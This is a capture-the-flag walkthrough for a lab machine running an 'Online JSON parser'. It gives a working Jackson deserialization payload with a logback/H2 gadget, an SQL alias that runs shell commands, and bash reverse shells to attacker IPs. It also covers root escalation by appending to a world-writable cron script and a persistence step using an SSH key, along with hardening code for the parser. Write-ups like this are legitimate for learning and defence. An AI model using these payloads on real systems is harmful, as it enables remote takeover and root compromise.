
Nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 20:06 +08
Nmap scan report for 10.10.10.214
Host is up (0.0074s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds


Start by enumerating the HTTP port.

Directory enumeration finds nothing beyond the index page, an "Online JSON parser".

This looks like the only route to user.

Feeding the parser various non-JSON inputs produces an error message:

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'test': was expecting 'null', 'true', 'false' or NaN

The unhandled exception leaks the parser library: Jackson (com.fasterxml.jackson).

Googling the keywords fasterxml and jackson leads to this CVE: a polymorphic-deserialization flaw in jackson-databind that lets JSON of the form ["fully.qualified.ClassName", {...}] instantiate an arbitrary class from the classpath. With logback-core and the H2 database on the classpath, ch.qos.logback.core.db.DriverManagerConnectionSource can be pointed at a jdbc:h2:mem: URL whose INIT parameter makes H2 fetch and run a SQL script over HTTP.

Create inject.sql, which defines an H2 Java alias that runs shell commands and then calls it with a bash reverse shell (replace 10.0.0.1 with your own IP and make the port match your listener):

-- H2 lets a SQL alias be backed by a Java method; the body is compiled on the target at runtime.
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    // read everything the command writes to stdout so it is returned as a string
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : ""; }
$$;
-- invoke it; 10.0.0.1 and 8080 are placeholders for the attacker host and the nc listener port
CALL SHELLEXEC('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1');

Serve inject.sql over HTTP. Note that the payload below has no port in its URL, so H2 will fetch from port 80: either run the server on port 80 or add :8000 to the URL. (SimpleHTTPServer is Python 2; on Python 3 use python3 -m http.server 8000.)

python -m SimpleHTTPServer 8000

Also start a listener on the port used in inject.sql:

nc -nvlp 8080

Finally, our payload, submitted to the JSON parser (x.x.x.x is the attacker IP). The two-element array form names the class to instantiate; opening the in-memory H2 database with INIT=RUNSCRIPT makes H2 download and execute inject.sql:

["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://x.x.x.x/inject.sql'"}]

And we got our reverse shell back.
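To make clear why a plain string of JSON ends up running SQL, here is an added illustration of the vulnerable pattern next to its hardened form. This is example code written for this writeup, not the target application's source: it assumes jackson-databind on the classpath (the vulnerable path reflects versions before the gadget class was blocklisted; the allowlisted mapper needs 2.10+), logback-core and H2 available to the JVM, and an attacker URL and package name that are placeholders.

```java
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

// Added example for this writeup; not code from the target "Online JSON parser".
public class JsonParserDemo {

    // Same payload as in the writeup; host and port are assumed placeholders.
    static final String PAYLOAD =
        "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\","
      + "{\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;"
      + "INIT=RUNSCRIPT FROM 'http://10.10.14.22:8000/inject.sql'\"}]";

    // VULNERABLE: enableDefaultTyping() tells Jackson to accept a type id from the
    // JSON itself, and ["fqcn", {...}] is its WRAPPER_ARRAY encoding of that id.
    // Jackson instantiates DriverManagerConnectionSource and calls setUrl().
    // Re-serialising the result (what a pretty-printing "parser" does) invokes
    // every getter, including getConnection(), which opens the H2 URL and runs
    // the INIT script. On jackson-databind >= 2.9.9.1 this class is blocklisted
    // and readValue() throws instead.
    static String vulnerableParse(String json) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();              // deprecated for exactly this reason
        Object parsed = mapper.readValue(json, Object.class);
        return mapper.writeValueAsString(parsed);  // getters fire here
    }

    // HARDENED: default typing is off, so the same input binds to plain JSON
    // structures: a List holding a String and a Map. No class is ever looked up.
    static Object safeParse(String json) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        return mapper.readValue(json, Object.class);
    }

    // If polymorphic deserialization is genuinely required (2.10+), restrict the
    // types Jackson may instantiate to an allowlist; "com.example.model." is an
    // assumed package name for the application's own DTOs.
    static ObjectMapper restrictedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfBaseType("com.example.model.")
            .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv,
            ObjectMapper.DefaultTyping.NON_FINAL, JsonTypeInfo.As.PROPERTY);
        return mapper;
    }

    public static void main(String[] args) throws Exception {
        // Prints the payload back as an ordinary list; nothing is executed.
        System.out.println(safeParse(PAYLOAD));
        // vulnerableParse(PAYLOAD) would fetch inject.sql and run SHELLEXEC.
    }
}
```

The practical check when auditing such an endpoint is to grep for enableDefaultTyping, activateDefaultTyping without a validator, and @JsonTypeInfo(use = Id.CLASS) on types reachable from untrusted input; any of these combined with a gadget-bearing classpath (logback-core plus an H2 driver here) is enough.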


Privilege escalation

After some enumeration, pspy64 shows something interesting:

/usr/bin/timer_backup.sh is run by root.

-rwxrw-rw- 1 pericles pericles 88 Nov 7 12:50 /usr/bin/timer_backup.sh

The script is world-writable, so any user can append commands that root will then execute.

echo "bash -i >& /dev/tcp/10.10.14.22/5555 0>&1" >> /usr/bin/timer_backup.sh

With nc listening on 5555, this gives an easy root shell. The session drops by itself in under 30 seconds, though, so a more durable alternative is to append a line that writes your SSH public key to /root/.ssh/authorized_keys and then log in as root over SSH.

listening on [any] 5555 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.214] 33944
bash: cannot set terminal process group (230926): Inappropriate ioctl for device
bash: no job control in this shell
root@time:/# whoami && id && hostname
whoami && id && hostname
root
uid=0(root) gid=0(root) groups=0(root)
time
root@time:/# exit
